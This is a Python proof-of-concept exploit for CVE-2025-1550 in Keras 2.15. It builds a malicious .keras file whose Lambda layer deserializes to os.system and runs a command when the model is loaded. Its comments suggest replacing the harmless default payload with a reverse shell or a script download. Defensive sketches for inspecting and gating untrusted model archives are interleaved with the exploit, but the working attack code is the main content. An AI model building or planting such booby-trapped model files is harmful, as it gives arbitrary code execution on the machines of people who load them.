#!/usr/bin/env python3

# Exploit Title: Keras 2.15 - Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-07-09
# Tested on: Ubuntu 22.04 LTS, Python 3.10, TensorFlow/Keras <= 2.15



# CVE: CVE-2025-1550
# Type: Remote Code Execution (RCE)
# Platform: Python / Machine Learning (Keras)
# Author Country: Jordan
# Attack Vector: Malicious .keras file (client-side code execution via deserialization)
#
# Description:
# This exploit abuses insecure deserialization in Keras model loading. By embedding
# a malicious "function" object inside a .keras file (or config.json), an attacker
# can execute arbitrary system commands as soon as the model is loaded using
# `keras.models.load_model()` or `model_from_json()`.
#
# This PoC generates a .keras file which, when loaded, runs the command in PAYLOAD.
# Use only in safe, sandboxed environments!
#
# Steps of exploitation:
# 1. The attacker creates a fake Keras model using a specially crafted config.json.
# 2. The model defines a Lambda layer whose "function" entry deserializes to `os.system`.
# 3. When the victim loads the model using `load_model()`, the malicious function is executed.
# 4. Result: arbitrary code execution as the user running the Python process.
#
# Affected Versions:
# - Keras <= 2.15
# - TensorFlow versions using unsafe deserialization paths (prior to April 2025 patch)
#
# Usage:
# $ python3 exploit_cve_2025_1550.py
# [*] Loads the malicious model
# [✓] Executes the payload (e.g., creates a file in /tmp)
#
# Options:
# - PAYLOAD: The command to execute upon loading (default: touch /tmp/pwned_by_keras)
# - You may change this to: reverse shell, download script, etc.
#
# Example:
# $ python3 exploit_cve_2025_1550.py
# [+] Created malicious model: malicious_model.keras
# [*] Loading malicious model to trigger exploit...
# [✓] Model loaded. If vulnerable, payload should be executed.
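
# Defensive note: the steps above rely on config.json naming a Lambda layer, so an
# untrusted archive can be inspected before anything is deserialized. The sketch
# below is not part of the original PoC. `list_layer_classes` is a hypothetical
# helper, and it assumes the archive layout this script produces: a zip with a
# top-level config.json whose "config" -> "layers" list holds the layer entries.

```python
import io
import json
import zipfile


def list_layer_classes(keras_archive):
    """Return the class_name of each top-level layer listed in config.json.

    Only the zip container and the JSON text are parsed. Nothing is turned
    into Keras objects, so no layer code runs during inspection.
    """
    with zipfile.ZipFile(keras_archive) as archive:
        config = json.loads(archive.read("config.json"))
    layers = config.get("config", {}).get("layers", [])
    return [layer.get("class_name") for layer in layers]
```

# A result containing "Lambda" is a reason to treat the file as untrusted. This
# check covers top-level layers only and is not a complete defense.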

import os
import json
from zipfile import ZipFile
import tempfile
import shutil

from tensorflow.keras.models import load_model

PAYLOAD = "touch /tmp/pwned_by_keras"

def create_malicious_config():
    return {
        "class_name": "Functional",
        "config": {
            "name": "pwned_model",
            "layers": [
                {
                    "class_name": "Lambda",
                    "config": {
                        "name": "evil_lambda",
                        "function": {
                            "class_name": "function",
                            "config": {
                                "module": "os",
                                "function_name": "system",
                                "registered_name": None
                            }
                        },
                        "arguments": [PAYLOAD]
                    }
                }
            ],
            "input_layers": [["evil_lambda", 0, 0]],
            "output_layers": [["evil_lambda", 0, 0]]
        }
    }
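
# Defensive note: the config above marks its callable with "class_name": "function"
# and names the module it comes from. A reviewer can walk an untrusted config dict
# and report every such reference. This is a minimal sketch, not part of the
# original PoC: `find_function_refs` and `ALLOWED_MODULES` are hypothetical names,
# the allowlist contents are an assumption, and the walker only recognizes the
# nested shape used in this file ("config" -> "module").

```python
ALLOWED_MODULES = {"keras", "keras.layers"}  # assumption: adjust to local policy


def find_function_refs(node, path="$"):
    """Yield (json_path, module) for every serialized function reference."""
    if isinstance(node, dict):
        if node.get("class_name") == "function":
            inner = node.get("config")
            module = inner.get("module") if isinstance(inner, dict) else None
            yield path, module
        for key, value in node.items():
            yield from find_function_refs(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from find_function_refs(item, f"{path}[{index}]")


def disallowed_refs(config):
    """Return the references whose module is not on the allowlist."""
    return [
        (path, module)
        for path, module in find_function_refs(config)
        if module not in ALLOWED_MODULES
    ]
```

# Any entry returned by `disallowed_refs` points at a callable outside the
# allowlist and should block loading until it has been reviewed.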

def build_malicious_keras(output_file="malicious_model.keras"):
    tmpdir = tempfile.mkdtemp()
    try:
        config_path = os.path.join(tmpdir, "config.json")
        with open(config_path, "w") as f:
            json.dump(create_malicious_config(), f)

        metadata_path = os.path.join(tmpdir, "metadata.json")
        with open(metadata_path, "w") as f:
            json.dump({"keras_version": "2.15.0"}, f)

        weights_path = os.path.join(tmpdir, "model.weights.h5")
        with open(weights_path, "wb") as f:
            f.write(b"\x89HDF\r\n\x1a\n")  # HDF5 signature

        with ZipFile(output_file, "w") as archive:
            archive.write(config_path, arcname="config.json")
            archive.write(metadata_path, arcname="metadata.json")
            archive.write(weights_path, arcname="model.weights.h5")

        print(f"[+] Created malicious model: {output_file}")
    finally:
        shutil.rmtree(tmpdir)

def trigger_exploit(model_path):
    print("[*] Loading malicious model to trigger exploit...")
    load_model(model_path)
    print("[✓] Model loaded. If vulnerable, payload should be executed.")
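
# Defensive note: `trigger_exploit` hands the file straight to `load_model()`. A
# cautious consumer can gate that call on a pre-load check of config.json. The
# sketch below is not part of the original PoC. `guarded_load`, `UnsafeModelError`
# and `BLOCKED_CLASSES` are hypothetical names, the blocklist is an assumption,
# and only top-level layers are checked, so it is a partial mitigation at best.

```python
import io
import json
import zipfile

BLOCKED_CLASSES = {"Lambda"}  # assumption: layer types refused from untrusted files


class UnsafeModelError(Exception):
    """Raised when an archive lists a layer class on the blocklist."""


def guarded_load(keras_archive, loader):
    """Call loader(keras_archive) only if config.json lists no blocked layer.

    `loader` is whatever function actually loads the model; it is passed in
    so this check stays independent of any particular Keras version.
    """
    with zipfile.ZipFile(keras_archive) as archive:
        config = json.loads(archive.read("config.json"))
    for layer in config.get("config", {}).get("layers", []):
        if layer.get("class_name") in BLOCKED_CLASSES:
            raise UnsafeModelError(
                f"blocked layer class: {layer.get('class_name')}"
            )
    return loader(keras_archive)
```

# Usage would look like `guarded_load("model.keras", load_model)`. Upgrading to a
# release that contains the fix for CVE-2025-1550 remains the primary remedy.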

if __name__ == "__main__":
    keras_file = "malicious_model.keras"
    build_malicious_keras(keras_file)
    trigger_exploit(keras_file)